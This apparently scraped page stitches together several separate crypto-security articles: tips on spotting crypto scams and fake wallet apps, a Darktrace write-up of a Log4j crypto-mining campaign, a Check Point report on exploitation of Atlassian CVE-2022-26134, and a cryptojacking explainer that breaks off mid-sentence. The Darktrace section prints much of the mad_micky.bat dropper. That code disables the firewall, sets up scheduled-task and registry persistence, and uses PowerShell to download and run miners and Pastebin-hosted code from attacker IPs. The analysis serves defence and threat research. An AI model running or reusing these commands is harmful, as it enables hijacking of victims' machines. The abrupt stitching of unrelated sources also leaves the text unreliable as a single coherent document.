But due to Apple’s stricter screening process, you won’t find these malicious apps in the App Store. So if you are an Apple user, you’d have to install the malicious apps from a third-party store or click on malicious links found on places like social media. The websites for these apps let users download apps outside the official store, using a system Apple put in place for businesses and educational institutes to install custom apps without going through the App Store. You must then manually install these apps. Once the app is up and running, it appears to work like a legitimate crypto wallet. But it isn’t. Instead, it’s stealing the currency deposited into it. Spelling, icons and description The first step in ascertaining whether an app is legit is checking out the spelling and icon. Fake apps usually have a name and icon that looks similar to the legitimate one, but something is usually off. If the app or developer names are misspelled, for example, the software is most likely phony. A quick search about the app on the internet will help to confirm its legitimacy. It is also important to consider if the app has a Google Editor’s choice badge. The badge is a distinction provided by the Google Play editorial team to recognize developers and apps with outstanding quality. Apps with this badge are unlikely to be fake. Don’t be a victim Follow these tips to keep crypto scammers at bay: Use official apps from official app stores that contain links to official websites. Be wary of online ads for crypto. Research any wallet app you’re interested in. Look for reviews and information about the company behind the app. Before you buy crypto, read Kim’s eBook on the subject. Application permissions Counterfeit apps usually request more permissions than necessary. This ensures that they glean as much data as possible from victims’ devices. As such, users should be wary of apps that require off-center permissions, such as device administrator privileges. Such authorizations could give cybercriminals unfettered access to a device and allow them to intercept sensitive data that can be used to unlock financial accounts, including crypto wallets. Intrusive app permissions can be blocked via a phone system’s privacy settings. Fake websites Scammers sometimes create fake cryptocurrency trading platforms or fake versions of official crypto wallets to trick unsuspecting victims. These fake websites usually have similar but slightly different domain names from the sites they attempt to mimic. They look very similar to legitimate sites, making it difficult to tell the difference. Fake crypto sites often operate in one of two ways: As phishing pages: All the details you enter, such as your crypto wallet’s password and recovery phrase and other financial information, end up in the scammers’ hands. As straightforward theft: Initially, the site may allow you to withdraw a small amount of money. As your investments seem to perform well, you might invest more money in the site. However, when you subsequently want to withdraw your money, the site either shuts down or declines the request. Phishing scams Crypto phishing scams often target information relating to online wallets. Scammers target crypto wallet private keys, which are required to access funds within the wallet. Their method of working is similar to other phishing attempts and related to the fake websites described above. They send an email to lure recipients to a specially created website asking them to enter private key information. Once the hackers have acquired this information, they steal the cryptocurrency in those wallets. Pump and dump schemes This involves a particular coin or token being hyped by fraudsters through an email blast or social media such as Twitter, Facebook, or Telegram. Not wanting to miss out, traders rush to buy the coins, driving up the price. Having succeeded in inflating the price, the scammers then sell their holdings – which causes a crash as the asset’s value sharply declines. This can happen within minutes. Fake apps Another common way scammers trick cryptocurrency investors is through fake apps available for download through Google Play and the Apple App Store. Although these fake apps are quickly found and removed, that doesn’t mean the apps aren’t impacting many bottom lines. Thousands of people have downloaded fake cryptocurrency apps. Fake celebrity endorsements Crypto scammers sometimes pose as or claim endorsements from celebrities, businesspeople, or influencers to capture the attention of potential targets. Sometimes, this involves selling phantom cryptocurrencies that don’t exist to novice investors. These scams can be sophisticated, involving glossy websites and brochures that appear to show celebrity endorsements from household names such as Elon Musk. Giveaway scams This is where scammers promise to match or multiply the cryptocurrency sent to them in what is known as a giveaway scam. Clever messaging from what often looks like a valid social media account can create a sense of legitimacy and spark a sense of urgency. This supposed ‘once-in-a-lifetime’ opportunity can lead people to transfer funds quickly in the hope of an instant return. Blackmail and extortion scams Another method scammers use is blackmail. They send emails that claim to have a record of adult websites visited by the user and threaten to expose them unless they share private keys or send cryptocurrency to the scammer. Cloud mining scams Cloud mining refers to companies that allow you to rent mining hardware they operate in exchange for a fixed fee and a share of the revenue you will supposedly make. In theory, this allows people to mine remotely without buying expensive mining hardware. However, many cloud mining companies are scams or, at best, ineffective – in that you end up losing money or earning less than was implied. Fraudulent initial coin offerings (ICOs) An initial coin offering or ICO is a way for start-up crypto companies to raise money from future users. Typically, customers are promised a discount on the new crypto coins in exchange for sending active cryptocurrencies like bitcoin or another popular cryptocurrency. Several ICOs have turned out to be fraudulent, with criminals going to elaborate lengths to deceive investors, such as renting fake offices and creating high-end marketing materials. How to spot cryptocurrency scams So, how to spot a crypto scam? Warning signs to look out for include: Promises of guaranteed returns: No financial investment can guarantee future returns because investments can go down as well as up. Any crypto offering that promises you will definitely make money is a red flag. A poor or non-existent whitepaper: Every cryptocurrency should have a whitepaper since this is one of the most critical aspects of an initial coin offering. The whitepaper should explain how the cryptocurrency has been designed and how it will work. If the whitepaper doesn’t make sense – or worse, doesn’t exist – then tread carefully. Excessive marketing: All businesses promote themselves. But one way that crypto fraudsters attract people is by investing in heavy marketing – online advertising, paid influencers, offline promotion, and so on. This is designed to reach as many people as possible in the shortest time possible – to raise money fast. If you feel that the marketing for a crypto offering seems heavy-handed or makes extravagant claims without backing them up, pause and do further research. Unnamed team members: With most investment businesses, it should be possible to find out who the key people behind it are. Usually, this means easy-to-find biographies of the people who run the investment plus an active presence on social media. If you can’t find out who is running a cryptocurrency, be cautious. Free money: Whether in cash or cryptocurrency, any investment opportunity promising free money is likely to be fake. How to protect yourself from cryptocurrency scams Many crypto frauds are sophisticated and convincing. Here are some steps you can take to protect yourself: Protect your wallet: To invest in cryptocurrency, you need a wallet with private keys. If a firm asks you to share your keys to participate in an investment opportunity, it’s highly likely to be a scam. Keep your wallet keys private. Keep an eye on your wallet app: The first time you transfer money, send only a small amount to confirm the legitimacy of a crypto wallet app. If you’re updating your wallet app and you notice suspicious behavior, terminate the update, and uninstall the app. Only invest in things you understand: If it’s not clear to you how a particular cryptocurrency works, then it’s best to pause and do further research before you decide whether to invest. Take your time: Scammers often use high-pressure tactics to get you to invest your money quickly – for example, by promising bonuses or discounts if you participate straightaway. Take your time and carry out your own research before investing any money. Be wary of social media adverts: Crypto scammers often use social media to promote their fraudulent schemes. They may use unauthorized images of celebrities or high-profile businesspeople to create a sense of legitimacy, or they may promise giveaways or free cash. Maintain a healthy skepticism when you see crypto opportunities promoted on social media and do your due diligence. Ignore cold calls: If someone contacts you out of the blue to sell you a crypto investment opportunity, it’s probably a scam. Never disclose personal information or transfer money to someone who contacts you in this way. Only download apps from official platforms: Although fake apps can end up in the Google Play Store or Apple App Store, it is safer to download apps from these platforms than elsewhere. Do your research: The most popular cryptocurrencies are not scams. But if you haven’t heard of a particular cryptocurrency, research it – see if there is a whitepaper you can read, find out who runs it and how it operates, and look for genuine reviews and testimonials. Look for an up-to-date and credible fake cryptocurrency list to check for scams. Is it too good to be true: Companies that promise guaranteed returns or to make you rich overnight are likely to be scams. If something seems too good to be true, tread carefully. Finally, as with any investment opportunity, never invest money you can’t afford to lose. Even if you’re not being scammed, cryptocurrency is volatile and speculative, so it’s essential to understand the risks. What to do if you fall victim to a crypto scam Falling victim to a cryptocurrency scam can be devastating, and it’s essential to act quickly if you have made a payment or disclosed personal information. Contact your bank immediately if you have: Made a payment using a debit or credit card. Made a payment via bank transfer. Shared personal details about yourself. Crypto fraudsters often sell the details they have captured to other criminals. So, it’s essential to change your usernames and passwords across the board, to prevent further damage. If you are the victim of a social media crypto scam, you can report it to the relevant social media platform. Depending on where you live, you can report frauds to the relevant body in your jurisdiction – for example, in the US, that would be the Federal Trade Commission. Other countries have their own equivalents. The number of downloads The number of times that an app has been downloaded is usually an indicator of how popular it is. Apps from reputable developers typically have millions of downloads and thousands of positive reviews. Inversely, apps with just a few thousand downloads require greater scrutiny. Confirming authenticity by contacting support If unsure about an application, contacting support through the company’s official website could help to avoid financial losses due to fraud. Furthermore, authentic apps can be downloaded from a company’s official website. Cryptocurrencies are underpinned by relatively new technology, so it is only natural that there are teething problems when it comes to use and adoption. Unfortunately, in recent years, black hats have targeted naïve crypto enthusiasts using fake crypto apps. While the problem is likely to persist for several years, increased scrutiny by tech companies is likely to temper the issue in the long run. Literature: Investigation of Cryptocurrency Wallets on iOS and Android Mobile Devices for Potential Forensic Artifacts Angelica Montanez https://cryptodeep.ru/doc/Montanez-Angelica_Final-Research-Paper.pdf Summary This type of fraudulent activity is not only prevalent at the moment, but it is also on the rise. Every day, a growing number of people fall victim to this. Users should always be cautious and suspicious of phishing scams. GitHub Telegram: https://t.me/cryptodeeptech Video: https://youtu.be/EkU8YhB91MI Source: https://cryptodeep.ru/crypto-wallet-protection Криптоанализ
  16. CRYPTO DEEP TECH Background on Log4j Alibaba Cloud Security Team publicly disclosed a critical vulnerability (CVE-2021-44228) enabling unauthenticated remote code execution against multiple versions of Apache Log4j2 (Log4Shell). Vulnerable servers can be exploited by attackers connecting via any protocol such as HTTPS and sending a specially crafted string. Log4j crypto-mining campaign Darktrace detected crypto-mining on multiple customer deployments which occurred as a result of exploiting this Log4j vulnerability. In each of these incidents, exploitation occurred via outbound SSL connections which appear to be requests for base64-encoded PowerShell scripts to bypass perimeter defenses and download batch (.bat) script files, and multiple executables that install crypto-mining malware. The activity had wider campaign indicators, including common hard-coded IPs, executable files, and scripts. The attack cycle begins with what appears to be opportunistic scanning of Internet-connected devices looking for VMWare Horizons servers vulnerable to the Log4j exploit. Once a vulnerable server is found, the attacker makes HTTP and SSL connections to the victim. Following successful exploitation, the server performs a callback on port 1389, retrieving a script named mad_micky.bat. This achieves the following: Disables Windows firewall by setting all profiles to state=off ‘netsh advfirewall set allprofiles state off’ Searches for existing processes that indicate other miner installs using ‘netstat -ano | findstr TCP’ to identify any process operating on ports :3333, :4444, :5555, :7777, :9000 and stop the processes running A new webclient is initiated to silently download wxm.exe Scheduled tasks are used to create persistence. The command ‘schtasks /create /F /sc minute /mo 1 /tn –‘ schedules a task and suppresses warnings, the task is to be scheduled within a minute of command and given the name, ‘BrowserUpdate’, pointing to malicious domain, ‘b.oracleservice[.]top’ and hard-coded IP’s: 198.23.214[.]117:8080 -o 51.79.175[.]139:8080 -o 167.114.114[.]169:8080 Registry keys are added in RunOnce for persistence: reg add HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run /v Run2 /d In at least two cases, the mad_micky.bat script was retrieved in an HTTP connection which had the user agent Mozilla/5.0 (compatible; MSIE 10.0; Windows NT 6.2; Win64; x64; Trident/6.0; MAARJS). This was the first and only time this user agent was seen on these networks. It appears this user agent is used legitimately by some ASUS devices with fresh factory installs; however, as a new user agent only seen during this activity it is suspicious. Following successful exploitation, the server performs a callback on port 1389, to retrieve script files. In this example, /xms.ps1 a base-64 encoded PowerShell script that bypasses execution policy on the host to call for ‘mad_micky.bat’: Figure 1: Additional insight on PowerShell script xms.ps1 The snapshot details the event log for an affected server and indicates successful Log4j RCE that resulted in the mad_micky.bat file download: Figure 2: Log data highlighting mad_micky.bat file Additional connections were initiated to retrieve executable files and scripts. The scripts contained two IP addresses located in Korea and Ukraine. A connection was made to the Ukrainian IP to download executable file xm.exe, which activates the miner. The miner, XMRig Miner (in this case) is an open source, cross-platform mining tool available for download from multiple public locations. The next observed exe download was for ‘wxm.exe’ (f0cf1d3d9ed23166ff6c1f3deece19b4). Figure 3: Additional insight regarding XMRig executable The connection to the Korean IP involved a request for another script (/2.ps1) as well as an executable file (LogBack.exe). This script deletes running tasks associated with logging, including SCM event log filter or PowerShell event log consumer. The script also requests a file from Pastebin, which is possibly a Cobalt Strike beacon configuration file. The log deletes were conducted through scheduled tasks and WMI included: Eventlogger, SCM Event Log Filter, DSM Event Log Consumer, PowerShell Event Log Consumer, Windows Events Consumer, BVTConsumer. Config file (no longer hosted): IEX (New-Object System.Net.Webclient) DownloadString(‘hxxps://pastebin.com/raw/g93wWHkR’) The second file requested from Pastebin, though no longer hosted by Pastebin, is part of a schtasks command, and so probably used to establish persistence: schtasks /create /sc MINUTE /mo 5 /tn “\Microsoft\windows\.NET Framework\.NET Framework NGEN v4.0.30319 32” /tr “c:\windows\syswow64\WindowsPowerShell\v1.0\powershell.exe -WindowStyle hidden -NoLogo -NonInteractive -ep bypass -nop -c ‘IEX ((new-object net.webclient).downloadstring(”hxxps://pastebin.com/raw/bcFqDdXx”’))'” /F /ru System The executable file Logback.exe is another XMRig mining tool. A config.json file was also downloaded from the same Korean IP. After this cmd.exe and wmic commands were used to configure the miner. These file downloads and miner configuration were followed by additional connections to Pastebin. Figure 4: OSINT correlation of mad_micky.bat file Process specifics — mad_micky.bat file Install set “STARTUP_DIR=%USERPROFILE%\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup” set “STARTUP_DIR=%USERPROFILE%\Start Menu\Programs\Startup” looking for the following utilities: powershell, find, findstr, tasklist, sc set “LOGFILE=%USERPROFILE%\mimu6\xmrig.log” if %EXP_MONER_HASHRATE% gtr 8192 ( set PORT=18192 & goto PORT_OK) if %EXP_MONER_HASHRATE% gtr 4096 ( set PORT=14906 & goto PORT_OK) if %EXP_MONER_HASHRATE% gtr 2048 ( set PORT=12048 & goto PORT_OK) if %EXP_MONER_HASHRATE% gtr 1024 ( set PORT=11024 & goto PORT_OK) if %EXP_MONER_HASHRATE% gtr 512 ( set PORT=10512 & goto PORT_OK) if %EXP_MONER_HASHRATE% gtr 256 ( set PORT=10256 & goto PORT_OK) if %EXP_MONER_HASHRATE% gtr 128 ( set PORT=10128 & goto PORT_OK) if %EXP_MONER_HASHRATE% gtr 64 ( set PORT=10064 & goto PORT_OK) if %EXP_MONER_HASHRATE% gtr 32 ( set PORT=10032 & goto PORT_OK) if %EXP_MONER_HASHRATE% gtr 16 ( set PORT=10016 & goto PORT_OK) if %EXP_MONER_HASHRATE% gtr 8 ( set PORT=10008 & goto PORT_OK) if %EXP_MONER_HASHRATE% gtr 4 ( set PORT=10004 & goto PORT_OK) if %EXP_MONER_HASHRATE% gtr 2 ( set PORT=10002 & goto PORT_OK) set port=10001 Preparing miner echo [*] Removing previous mimu miner (if any) sc stop gado_miner sc delete gado_miner taskkill /f /t /im xmrig.exe taskkill /f /t/im logback.exe taskkill /f /t /im network02.exe :REMOVE_DIR0 echo [*] Removing “%USERPROFILE%\mimu6” directory timeout 5 rmdir /q /s “USERPROFILE%\mimu6” >NUL 2>NUL IF EXIST “%USERPROFILE%\mimu6” GOTO REMOVE_DIR0 Download of XMRIG echo [*] Downloading MoneroOcean advanced version of XMRig to “%USERPROFILE%\xmrig.zip” powershell -Command “$wc = New-Object System.Net.WebClient; $wc.DownloadFile(‘http://141.85.161[.]18/xmrig.zip’, ;%USERPROFILE%\xmrig.zip’)” echo copying to mimu directory if errorlevel 1 ( echo ERROR: Can’t download MoneroOcean advanced version of xmrig goto MINER_BAD) Unpack and install echo [*] Unpacking “%USERPROFILE%\xmrig.zip” to “%USERPROFILE%\mimu6” powershell -Command “Add-type -AssemblyName System.IO.Compression.FileSystem; [System.IO.Compression.ZipFile]::ExtractToDirectory(‘%USERPROFILE%\xmrig.zip’, ‘%USERPROFILE%\mimu6’)” if errorlevel 1 ( echo [*] Downloading 7za.exe to “%USERPROFILE%za.exe” powershell -Command “$wc = New-Object System.Net.WebClient; $wc.Downloadfile(‘http://141.85.161[.]18/7za.txt’, ‘%USERPROFILE%za.exe’” powershell -Command “$out = cat ‘%USERPROFILE%\mimu6\config.json’ | %%{$_ -replace ‘\”url\”: *\”.*\”,’, ‘\”url\”: \”207.38.87[.]6:3333\”,’} | Out-String; $out | Out-File -Encoding ASCII ‘%USERPROFILE%\mimu6\config.json’” powershell -Command “$out = cat ‘%USERPROFILE%\mimu6\config.json’ | %%{$_ -replace ‘\”user\”: *\”.*\”,’, ‘\”user\”: \”%PASS%\”,’} | Out-String; $out | Out-File -Encoding ASCII ‘%USERPROFILE%\mimu6\config.json’” powershell -Command “$out = cat ‘%USERPROFILE%\mimu6\config.json’ | %%{$_ -replace ‘\”pass\”: *\”.*\”,’, ‘\”pass\”: \”%PASS%\”,’} | Out-String; $out | Out-File -Encoding ASCII ‘%USERPROFILE%\mimu6\config.json’” powershell -Command “$out = cat ‘%USERPROFILE%\mimu6\config.json’ | %%{$_ -replace ‘\”max-cpu-usage\”: *\d*,’, ‘\”max-cpu-usage\”: 100,’} | Out-String; $out | Out-File -Encoding ASCII ‘%USERPROFILE%\mimu6\config.json’” set LOGFILE2=%LOGFILE:\=\\% powershell -Command “$out = cat ‘%USERPROFILE%\mimu6\config.json’ | %%{$_ -replace ‘\”log-file\”: *null,’, ‘\”log-file\”: \”%LOGFILE2%\”,’} | Out-String; $out | Out-File -Encoding ASCII ‘%USERPROFILE%\mimu6\config.json’” if %ADMIN% == 1 goto ADMIN_MINER_SETUP if exist “%USERPROFILE%\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup” ( set “STARTUP_DIR=%USERPROFILE%\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup” goto STARTUP_DIR_OK ) if exist “%USERPROFILE%\Start Menu\Programs\Startup” ( set “STARTUP_DIR=%USERPROFILE%\Start Menu\Programs\Startup” goto STARTUP_DIR_OK ) echo [*] Downloading tools to make gado_miner service to “%USERPROFILE%\nssm.zip” powershell -Command “$wc = New-Object System.Net.WebClient; $wc.DownloadFile(‘[http://141.85.161[.]18/nssm.zip’, ‘%USERPROFILE%\nssm.zip’)” if errorlevel 1 ( echo ERROR: Can’t download tools to make gado_miner service exit /b 1 Detecting the campaign using Darktrace The key model breaches Darktrace used to identify this campaign include compromise-focussed models for Application Protocol on Uncommon Port, Outgoing Connection to Rare From Server, and Beaconing to Rare Destination. File-focussed models for Masqueraded File Transfer, Multiple Executable Files and Scripts from Rare Locations, and Compressed Content from Rare External Location. Cryptocurrency mining is detected under the Cryptocurrency Mining Activity models. The models associated with Unusual PowerShell to Rare and New User Agent highlight the anomalous connections on the infected devices following the Log4j callbacks. Customers with Darktrace’s Autonomous Response technology, Antigena, also had actions to block the incoming files and scripts downloaded and restrict the infected devices to normal pattern of life to prevent both the initial malicious file downloads and the ongoing crypto-mining activity. Appendix Darktrace model detections Anomalous Connection / Application Protocol on Uncommon Port Anomalous Connection / New User Agent to IP Without Hostname Anomalous Connection / PowerShell to Rare External Anomalous File / EXE from Rare External location Anomalous File / Masqueraded File Transfer Anomalous File / Multiple EXE from Rare External Locations Anomalous File / Script from Rare External Location Anomalous File / Zip or Gzip from Rare External Location Anomalous Server Activity / Outgoing from Server Compliance / Crypto Currency Mining Activity Compromise / Agent Beacon (Long Period) Compromise / Agent Beacon (Medium Period) Compromise / Agent Beacon (Short Period) Compromise / Beacon to Young Endpoint Compromise / Beaconing Activity To External Rare Compromise / Crypto Currency Mining Activity Compromise / Sustained TCP Beaconing Activity To Rare Endpoint Device / New PowerShell User Agent Device / Suspicious Domain MITRE ATT&CK techniques observed IoCs On May 31, a critical unpatched vulnerability, which affects all confluence server and data center supported versions was reported to Atlassian by Volexity, a security company. Atlassian warned their customers of the critical vulnerability on June 2 and issued a patch a day later. CISA added this vulnerability to their list of Known Exploited Vulnerabilities on June 3. Check Point released a dedicated protection to prevent an attack exploiting this vulnerability and advises customers to patch the affected systems. The Vulnerability The vulnerability in the Atlassian Confluence and Data Center, designated as CVE-2022-26134, may lead to an unauthenticated Object-Graph Navigation Language (OGNL) expression injection attack. A remote, unauthenticated attacker can use this vulnerability to execute arbitrary code on the target server by placing a malicious payload in the URI. Figure 1: Malicious payload that exploits CVE-2022-26134. In The Wild Exploitation Check Point Research (CPR) researchers noticed a large number of exploitations attempts since the vulnerability was published. At first, many of the would-be attackers used scanning methods to identify vulnerable targets. After a few days, the attackers started to use the vulnerability to download malware to the affected systems. Among the exploitation logs, researchers noticed a few malicious payloads that are related to the same campaign and that originated from the same source but targeted different platforms: Linux and Windows. The infection chain depends on the victim’s operating system. The Linux OS Targeted Attack The attacker utilized the Atlassian 0-day vulnerability by sending a crafted HTTP request to the victim. Figure 2: A crafted HTTP request exploiting CVE-2022-26134 with a base64 encoded payload. The base64 string decodes into another base64 encoded string. Overall, researchers had to decode the string a few times to get the actual payload. Figure 3: The decoded base64 string. This script downloads a bash script file called xms from the remote C&C server to the victim’s tmp folder, executes it, and deletes it afterward. Figure 4: Part of the malicious xms script. The xms file is a dropper script. It uninstalls running agents from the victim’s machine and adds itself to cron jobs to maintain persistence upon reboot. In addition, a network connectivity test to a[.]oracleservice.top is performed constantly. In an attempt to spread to other machines, the script searches for ssh keys and tries to connect. It then downloads the xms file from the C&C server and executes it. The script downloads an elf executable file called dbused to the tmp folder in various remote IPs. The dbused file is packed using upx to avoid static detection. The elf file is a crypto miner that exhausts the victim machine’s resources: Figure 5: The dbused process exhausts the system resources. The Windows OS Targeted Attack The attacker utilized the Atlassian vulnerability to execute a PowerShell download cradle to initiate a fileless attack from a remote C&C server. Figure 6: A crafted HTTP request exploiting CVE-2022-26134 using PowerShell commands. The lol.ps1 script is injected to a PowerShell memory process. The script verifies the processor’s architecture, using wmi to check whether it matches its requirements. It then downloads an executable file called checkit2 to the tmp folder and runs it in hidden mode. Figure 7: The lol.ps1 script. The checkit2.exe process spawns a child process, called InstallUtil.exe, which connects to the C&C server. The InstallUtil.exe in turn spawns another child process child process, AddInProcess.exe, which is the crypto miner. After a few moments of running on the victim’s machine, the checkit2 process terminates itself. Figure 8: The checkit2.exe process running on the system. Figure 9: The InstallUtil.exe process running on the system. The malware downloads a new copy of itself, with a new name, to the Start Menu folder. Figure 10: The cloud.exe file downloaded to the Startup folder. The crypto miner now runs on the machine and exhausts all the system’s resources: Figure 11: Crypto wallet information. Attack chain Both attack scenarios start with an initial crafted HTTP request exploiting the CVE-2022-26134 vulnerability. The attacker executes commands using the Java execution function to download a malicious payload to the victim’s machine. The malicious payload then downloads an executable file according to the affected OS. Both executables run a crypto miner to utilize the victim’s resources for their own benefit. Threat Actors The a[.]oracleservice.top domain and the crypto wallet we extracted from the system are related to a cybercriminal group called the “8220 gang”. Check Point Protections: IPS: Atlassian Confluence Remote Code Execution (CVE-2022-26134) Anti-Bot: Trojan.WIN32.XMRig IOCs: 198.251.86[.]46 51.79.175[.]139 167.114.114[.]169 146.59.198[.]38 51.255.171[.]23 a.oracleservice[.]top d2bae17920768883ff8ac9a8516f9708967f6c6afe2aa6da0241abf8da32456e 2622f6651e6eb01fc282565ccbd72caba9844d941b9d1c6e6046f68fc873d5e0 4e48080f37debd76af54a3231ecaf3aa254a008fae1253cdccfcc36640f955d9 4b8be1d23644f8cd5ea22fa4f70ee7213d56e3d73cbe1d0cc3c8e5dfafe753e0 Monero Wallet: 46E9UkTFqALXNh2mSbA7WGDoa2i6h4WVgUgPVdT9ZdtweLRvAhWmbvuY1dhEmfjHbsavKXo3eGf5ZRb4qJzFXLVHGYH4moQ Cryptojacking explained: How to prevent, detect, and recover from it Criminals are using ransomware-like tactics and poisoned websites to get your employees’ computers to mine cryptocurrencies. Here’s what you can do to stop it. Cryptojacking definition Cryptojacking is the unauthorized use of someone else’s compute resources to mine cryptocurrency. Hackers seek to hijack any kind of systems they can take over—desktops, servers, cloud infrastructure and more—to illicitly mine for crypto coins. Regardless of the delivery mechanism, cryptojacking code typically works quietly in the background as unsuspecting victims use their systems normally. The only signs they might notice is slower performance, lags in execution, overheating, excessive power consumption, or abnormally high cloud computing bills. How cryptojacking works Coin mining is a legitimate process in the cryptocurrency world that releases new cryptocurrency into circulation. The process works by rewarding currency to the first miner who solves a complex computational problem. That problem completes blocks of verified transactions that are added to the cryptocurrency blockchain. “Miners are essentially getting paid for their work as auditors. They are doing the work of verifying the legitimacy of Bitcoin transactions,” detailed a recent Investopedia explainer on how Bitcoin mining works. “In addition to lining the pockets of miners and supporting the Bitcoin ecosystem, mining serves another vital purpose: It is the only way to release new cryptocurrency into circulation.” Earning cryptocurrency via coin mining typically takes a huge amount of processing power and energy to carry off. Additionally, the cryptocurrency ecosystem is designed in a way that makes mining harder and reduces the rewards for it over time and with more mining competition. This makes legitimate cryptocurrency coin mining an extremely costly affair, with expenses rising all the time. Cybercriminals slash mining overhead by simply stealing compute and energy resources. They use a range of hacking techniques to gain access to systems that will do the computational work illicitly and then have these hijacked systems send the results to a server controlled by the hacker. Cryptojacking attack methods The attack methods are limited only by the cryptojackers’ creativity, but the following are some of the most common ones used today. Endpoint attacks In the past, cryptojacking was primarily an endpoint malware play, existing as yet another moneymaking objective for dropping malware on desktops and laptops. Traditional cryptojacking malware is delivered via typical routes like fileless malware, phishing schemes, and embedded malicious scripts on websites and in web apps. The most basic way cryptojacking attackers can steal resources is by sending endpoint users a legitimate-looking email that encourages them to click on a link that runs code to place a cryptomining script on their computer. It runs in the background and sends results back via a command and control (C2) infrastructure. Another method is to inject a script on a website or an ad that is delivered to multiple websites. Once victims visit the website or the infected ad pops up in their browsers, the script automatically executes. No code is stored on the victims’ computers. These avenues still remain a legitimate concern, though criminals have added significantly more sophisticated techniques to their cryptojacking playbooks as they seek to scale up profits, with some of these evolving methods described below. Scan for vulnerable servers and network devices Attackers seek to amp up the profitability of cryptojacking by expanding their horizons to servers, network devices, and even IoT devices. Servers, for example, are a particularly juicy target since they usually are usually higher powered than a run-of-the-mill desktop. They’re also a prime hunting ground in 2022 as the bad guys scan for servers exposed to the public internet that contain vulnerabilities such as Log4J, exploiting the flaw and quietly loading cryptomining software on the system that’s connected to the hacker’s servers. Often attackers will use the initially compromised system to move their cryptojacking laterally into other network devices. “We’re seeing an uptick in cryptomining stemming from the Log4J vulnerability,” says Sally Vincent, senior threat research engineer for LogRhythm. “Hackers are breaking into networks and installing malware that uses storage to mine cryptos.” Software supply chain attacks Cybercriminals are targeting the software supply chain by seeding open-source code repositories with malicious packages and libraries that contain cryptojacking scripts embedded within their code. With developers downloading these packages by the millions around the globe, these attacks can rapidly scale up cryptojacking infrastructure for the bad guys in two ways. The malicious packages can be used to target developer systems—and the networks and cloud resources they connect to—to use them directly as illicit cryptomining resources. Or they can leverage these attacks to poison the software that these developers are building with components that execute cryptomining scripts on the machines of an application’s end user. Leveraging cloud infrastructure Many cryptojacking enterprises are taking advantage of the scalability of cloud resources by breaking into cloud infrastructure and tapping into an even broader collection of compute pools to power their mining activity. A study last fall by Google’s Cybersecurity Action Team reported that 86% of compromised cloud instances are used for cryptomining. “Today, attackers are targeting cloud services by any means to mine more and more cryptocurrency, as cloud services can allow them to run their calculations on a larger scale than just a single local machine, whether they’re taking over a user’s managed cloud environment or even abusing SaaS applications to execute their calculations,” Guy Arazi, senior security researcher for Palo Alto Networks, wrote in a blog post. One of the common methods to do this is by scanning for exposed container APIs or unsecured cloud storage buckets and using that access to start loading coin-mining software on impacted container instances or cloud servers. The attack is typically automated with scanning software that looks for servers accessible to the public internet with exposed APIs or unauthenticated access possible. Attackers generally use scripts to drop the miner payloads onto the initial system and to look for ways to propagate across connected cloud systems. “The profitability and ease of conducting cryptojacking at scale makes this type of attack low-hanging fruit,” said Matt Muir, security researcher for Cado Security, in a blog post explaining that cloud-based attacks are particularly lucrative. “This will likely continue for as long as users continue to expose services such as Docker and Redis to untrusted networks.” Why cryptojacking is popular According to a report by ReasonLabs, in the last year 58.4% of all Trojans detected were cryptojacking coin miners. Meantime, another study by SonicWall found that 2021 was the worst year to date for cryptojacking attacks, with the category logging 97.1 million attacks over the course of the year. These numbers are so strong because cryptojacking is virtually minting money for cybercriminals. When a crook can mine for cryptocurrency on a seemingly limitless pool of free compute resources from victim machines, the upside for them is huge. Even with the precipitous drop in Bitcoin valuation this spring that brought it below the $30,000 level, cryptojackers’ illicit margins still make business sense as the value of what they mine far outstrips the costs of their criminal infrastructure. Real-world cryptojacking examples WatchDog targets Docker Engine API endpoints and Redis servers A honeypot from the security research team at Cado Labs discovered a multi-stage cryptojacking attack that targets exposed Docker Engine API endpoints and Redis servers, and can propogate in a worm-like fashion. The attack is perpetrated by the WatchDog attack group, which has been particularly active in late 2021 and 2022 with numerous cryptojacking campaigns. Alibaba ECS instances in cryptomining crosshairs TeamTNT was one of the first hacking groups to shift cryptojacking focus heavily to cloud-oriented services. Researchers with TrendMicro in late 2021 reported that this group, along with rivals like the Kinsig gang, were conducting cryptojacking campaigns that installed miners in Alibaba Elastic Computing Service (ECS) instances and disabling security features to evade detection. Miner bots and backdoors use Log4J to attack VMware Horizon servers The Log4Shell vulnerability has been a boon to cryptojacking attackers in 2022. In one marked example, Sophos researchers found earlier this year that a ‘horde’ of attackers were targeting VMware Horizon servers to deliver a range of crypojacking payloads that included the z0Miner, the JavaX miner and at least two XMRig variants, Jin and Mimu cryptocurrency miner bots. Supply chain attacks via npm libraries The software supply chain security experts at Sonatype in fall of 2021 sounded the alarm on malicious cryptomining packages hiding in npm, the JavaScript package repository used by developers worldwide. At the time it found a trio of packages, at least one of which was impersonating a popular, legitimate library used by developers called “ua-parser-js,” which gets over 7 million weekly downloads and would be an ideal way to lure in developers to accidentally download a malicious bit of code and install it in their software. A few months after that report, researchers WhiteSource (now Mend) released an additional report that showed npm is swarming with malicious code—as many as 1,300 malicious packages that include cryptojacking and other nefarious behavior. Romanian attackers target Linux machines with cryptomining malware Last summer Bitdefender discovered a Romanian threat group that was targeting Linux-based machines with SSH credentials to deploy Monero mining malware. The tools they used were distributed on an as-a-service model. This example was on the spear tip of what appears to be a growing trend of Linux system cryptomining attacks. A report earlier this year from VMware detailed a growing targeting of Linux-based multi-cloud environments, particularly using the XMRig mining software. “Many of the cryptomining samples from Linux-based systems have some relationship to the XMRig application,” explained the report, which showed that 89% of cryptomining attacks used XMRig-related libraries. “Therefore, when XMRig-specific libraries and modules in Linux binaries are identified, it is likely evidence of potential cryptomining behavior. CoinStomp uses sophisticated evasion tactics CoinStop is another cryptojacking campaign recently discovered to be targeting Asian cloud service providers (CSPs). This one distinguished itself by its anti-forensics and evasion measures. These included timestomping to manipulate system timestamps, removal of system cryptographic policies, and the use of the he /dev/tcp device file to create a reverse shell session, explained Cado’s Muir in a report on the attack. Cryptocurrency farm found in warehouse Cryptojackers can sometimes go to great lengths to steal not only processing power but also energy and network resources from corporate infrastructure. Last year Darktrace analysts highlighted an anonymous example from one of its clients where it discovered a cryptomining farm in a warehouse that was disguised inside an unassuming set of cardboard boxes. Inside was a stealthy rig running multiple GPUs that were hooked into the company’s network power, How to prevent cryptojacking As it has evolved into a multi-vector attack that spans across endpoint, server, and cloud resources, preventing cryptojacking takes an orchestrated and well-rounded defense strategy. The following steps can 